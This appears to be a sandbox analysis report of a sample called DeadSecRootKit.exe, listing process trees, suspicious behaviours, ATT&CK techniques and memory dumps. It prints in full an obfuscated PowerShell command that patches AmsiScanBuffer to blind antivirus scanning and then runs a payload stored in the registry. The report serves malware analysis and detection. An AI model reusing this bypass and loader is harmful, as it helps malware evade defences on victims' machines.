PID 1052 wrote to memory of 1820	1052	dllhost.exe	33
PID 1052 wrote to memory of 1828	1052	dllhost.exe	34
PID 1052 wrote to memory of 1860	1052	dllhost.exe	35
PID 1052 wrote to memory of 1952	1052	dllhost.exe	36
PID 1052 wrote to memory of 2056	1052	dllhost.exe	37
PID 1052 wrote to memory of 2104	1052	dllhost.exe	38
PID 1052 wrote to memory of 2284	1052	dllhost.exe	39
PID 1052 wrote to memory of 2300	1052	dllhost.exe	40
PID 1052 wrote to memory of 2316	1052	dllhost.exe	41
PID 1052 wrote to memory of 2444	1052	dllhost.exe	42
PID 1052 wrote to memory of 2456	1052	dllhost.exe	43
PID 1052 wrote to memory of 2484	1052	dllhost.exe	44
PID 1052 wrote to memory of 2496	1052	dllhost.exe	45
PID 1052 wrote to memory of 2512	1052	dllhost.exe	46
PID 1052 wrote to memory of 2524	1052	dllhost.exe	47
PID 1052 wrote to memory of 2532	1052	dllhost.exe	48
PID 1052 wrote to memory of 2956	1052	dllhost.exe	49
PID 1052 wrote to memory of 2976	1052	dllhost.exe	50
PID 1052 wrote to memory of 3056	1052	dllhost.exe	51
PID 1052 wrote to memory of 2388	1052	dllhost.exe	52
PID 1052 wrote to memory of 3208	1052	dllhost.exe	53
PID 1052 wrote to memory of 3376	1052	dllhost.exe	54
PID 1052 wrote to memory of 3924	1052	dllhost.exe	57
PID 1052 wrote to memory of 3532	1052	dllhost.exe	58
PID 1052 wrote to memory of 4932	1052	dllhost.exe	60
PID 1052 wrote to memory of 4684	1052	dllhost.exe	62
PID 1052 wrote to memory of 4412	1052	dllhost.exe	63
PID 1052 wrote to memory of 2596	1052	dllhost.exe	64
PID 1052 wrote to memory of 4368	1052	dllhost.exe	65
PID 1052 wrote to memory of 4824	1052	dllhost.exe	66
PID 1052 wrote to memory of 3872	1052	dllhost.exe	67
PID 1052 wrote to memory of 4812	1052	dllhost.exe	68
PID 1052 wrote to memory of 2820	1052	dllhost.exe	69
PID 1052 wrote to memory of 4856	1052	dllhost.exe	73

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:564
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:1004
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{113e3279-9f86-43c4-b8e6-4ed7747f2281}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1052

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:640

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:724

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:904

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:1012

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:396

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:920

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1028

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1088
- c:\windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2388
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XTWQxsVkeUnC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wtgaSPMPLMvrEM,[Parameter(Position=1)][Type]$njNRvEGRYj)$AexYBQqufxJ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+'ed'+'D'+''+[Char](101)+''+[Char](108)+'eg'+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+'y'+'M'+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+'p'+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+'s'+[Char](44)+''+'P'+''+[Char](117)+'bli'+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+'l'+[Char](101)+'d'+[Char](44)+''+'A'+''+[Char](110)+''+'s'+'iC'+'l'+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+'l'+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$AexYBQqufxJ.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+'c'+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$wtgaSPMPLMvrEM).SetImplementationFlags('R'+'u'+''+[Char](110)+''+[Char](116)+''+'i'+'me'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$AexYBQqufxJ.DefineMethod(''+'I'+''+[Char](110)+'v'+[Char](111)+'k'+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+'li'+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+'N'+''+[Char](101)+''+[Char](119)+''+'S'+''+'l'+''+[Char](111)+''+[Char](116)+','+'V'+'irtu'+[Char](97)+''+[Char](108)+'',$njNRvEGRYj,$wtgaSPMPLMvrEM).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+'Ma'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $AexYBQqufxJ.CreateType();}$ScOwugqUiZlTm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+'d'+'ll')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+''+'i'+'n3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+''+'N'+''+[Char](97)+'ti'+'v'+''+[Char](101)+''+'M'+''+[Char](101)+'th'+'o'+'d'+[Char](115)+'');$SfrXcqhtULGzjo=$ScOwugqUiZlTm.GetMethod(''+'G'+''+[Char](101)+'tP'+[Char](114)+''+[Char](111)+'cA'+[Char](100)+''+[Char](100)+'re'+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'ta'+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gIKIIsoRYIHSJYdQkPs=XTWQxsVkeUnC @([String])([IntPtr]);$dkOrolNhNKAOWXprtFeMIO=XTWQxsVkeUnC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$qvDYsquTSuC=$ScOwugqUiZlTm.GetMethod('G'+[Char](101)+''+'t'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+'a'+[Char](110)+''+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+'l'+''+'3'+''+[Char](50)+''+'.'+'d'+[Char](108)+''+'l'+'')));$WLapqDSLzZwdkN=$SfrXcqhtULGzjo.Invoke($Null,@([Object]$qvDYsquTSuC,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+'a'+''+'r'+''+[Char](121)+''+[Char](65)+'')));$UJQcxrRZZTRTQuplL=$SfrXcqhtULGzjo.Invoke($Null,@([Object]$qvDYsquTSuC,[Object](''+'V'+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+'ro'+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$AfWOGlG=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WLapqDSLzZwdkN,$gIKIIsoRYIHSJYdQkPs).Invoke(''+'a'+''+[Char](109)+'s'+'i'+''+[Char](46)+'d'+'l'+''+[Char](108)+'');$CFJKOOWwPpdwjApEZ=$SfrXcqhtULGzjo.Invoke($Null,@([Object]$AfWOGlG,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+'u'+[Char](102)+''+'f'+''+'e'+'r')));$WViAQAzszp=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UJQcxrRZZTRTQuplL,$dkOrolNhNKAOWXprtFeMIO).Invoke($CFJKOOWwPpdwjApEZ,[uint32]8,4,[ref]$WViAQAzszp);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$CFJKOOWwPpdwjApEZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UJQcxrRZZTRTQuplL,$dkOrolNhNKAOWXprtFeMIO).Invoke($CFJKOOWwPpdwjApEZ,[uint32]8,0x20,[ref]$WViAQAzszp);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+''+'W'+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](68)+''+[Char](101)+''+[Char](97)+''+[Char](100)+''+[Char](115)+'ta'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4856
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:428

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1160

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1216

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1288

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1296

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1312

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1428
- c:\windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2956

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1440

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1516

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1564

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1576

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1676

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1684

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1828

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1860

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1952

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2056

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2104

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2284

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2300

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2316

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2444

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2456

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2484

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2496

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2512

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2524

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2532

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2976

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3056

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3208

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3376
- C:\Users\Admin\AppData\Local\Temp\DeadSecRootKit.exe
  "C:\Users\Admin\AppData\Local\Temp\DeadSecRootKit.exe"
  2⤵
  PID:2832
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:516

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3924

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3532

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4932

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
PID:4412

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:2596

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:4368

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4824

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
PID:3872

C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
1⤵
PID:4812

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:2820

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3140

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\Temp\__PSScriptPolicyTest_xqmlg1me.1i4.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/564-58-0x00007FFBFF660000-0x00007FFBFF670000-memory.dmp

Filesize
64KB

Download
memory/564-702-0x0000029080040000-0x0000029080062000-memory.dmp

Filesize
136KB

Download
memory/564-575-0x0000029080040000-0x0000029080062000-memory.dmp

Filesize
136KB

Download
memory/564-576-0x00007FFC3F675000-0x00007FFC3F676000-memory.dmp

Filesize
4KB

Download
memory/564-47-0x0000029080040000-0x0000029080062000-memory.dmp

Filesize
136KB

Download
memory/564-48-0x0000029080070000-0x0000029080097000-memory.dmp

Filesize
156KB

Download
memory/564-49-0x0000029080070000-0x0000029080097000-memory.dmp

Filesize
156KB

Download
memory/564-57-0x0000029080070000-0x0000029080097000-memory.dmp

Filesize
156KB

Download
memory/640-62-0x0000013CE0700000-0x0000013CE0727000-memory.dmp

Filesize
156KB

Download
memory/640-703-0x0000013CE06D0000-0x0000013CE06F2000-memory.dmp

Filesize
136KB

Download
memory/640-70-0x0000013CE0700000-0x0000013CE0727000-memory.dmp

Filesize
156KB

Download
memory/640-577-0x0000013CE06D0000-0x0000013CE06F2000-memory.dmp

Filesize
136KB

Download
memory/640-71-0x00007FFBFF660000-0x00007FFBFF670000-memory.dmp

Filesize
64KB

Download
memory/724-706-0x000001F876810000-0x000001F876832000-memory.dmp

Filesize
136KB

Download
memory/724-86-0x00007FFBFF660000-0x00007FFBFF670000-memory.dmp

Filesize
64KB

Download
memory/724-77-0x000001F876850000-0x000001F876877000-memory.dmp

Filesize
156KB

Download
memory/724-85-0x000001F876850000-0x000001F876877000-memory.dmp

Filesize
156KB

Download
memory/724-580-0x000001F876810000-0x000001F876832000-memory.dmp

Filesize
136KB

Download
memory/904-90-0x0000024A00240000-0x0000024A00267000-memory.dmp

Filesize
156KB

Download
memory/904-96-0x0000024A00240000-0x0000024A00267000-memory.dmp

Filesize
156KB

Download
memory/904-97-0x00007FFBFF660000-0x00007FFBFF670000-memory.dmp

Filesize
64KB

Download
memory/1052-705-0x00007FFC3F5D0000-0x00007FFC3F7AB000-memory.dmp

Filesize
1.9MB

Download
memory/1052-40-0x00007FFC3F5D0000-0x00007FFC3F7AB000-memory.dmp

Filesize
1.9MB

Download
memory/1052-41-0x00007FFC3F420000-0x00007FFC3F4CE000-memory.dmp

Filesize
696KB

Download
memory/1052-35-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1052-574-0x00007FFC3F421000-0x00007FFC3F494000-memory.dmp

Filesize
460KB

Download
memory/1052-39-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1052-34-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1052-37-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1052-44-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1052-33-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1052-579-0x00007FFC3F5D0000-0x00007FFC3F7AB000-memory.dmp

Filesize
1.9MB

Download
memory/4856-31-0x00007FFC3F5D0000-0x00007FFC3F7AB000-memory.dmp

Filesize
1.9MB

Download
memory/4856-660-0x00007FFC23350000-0x00007FFC23D3C000-memory.dmp

Filesize
9.9MB

Download
memory/4856-0-0x00007FFC23353000-0x00007FFC23354000-memory.dmp

Filesize
4KB

Download
memory/4856-74-0x00007FFC23350000-0x00007FFC23D3C000-memory.dmp

Filesize
9.9MB

Download
memory/4856-73-0x00007FFC23350000-0x00007FFC23D3C000-memory.dmp

Filesize
9.9MB

Download
memory/4856-7-0x000002B75B9E0000-0x000002B75BA02000-memory.dmp

Filesize
136KB

Download
memory/4856-6-0x00007FFC23350000-0x00007FFC23D3C000-memory.dmp

Filesize
9.9MB

Download
memory/4856-10-0x000002B75BCD0000-0x000002B75BD46000-memory.dmp

Filesize
472KB

Download
memory/4856-5-0x00007FFC23350000-0x00007FFC23D3C000-memory.dmp

Filesize
9.9MB

Download
memory/4856-24-0x00007FFC23350000-0x00007FFC23D3C000-memory.dmp

Filesize
9.9MB

Download
memory/4856-30-0x000002B75BA70000-0x000002B75BA98000-memory.dmp

Filesize
160KB

Download
memory/4856-32-0x00007FFC3F420000-0x00007FFC3F4CE000-memory.dmp

Filesize
696KB

Download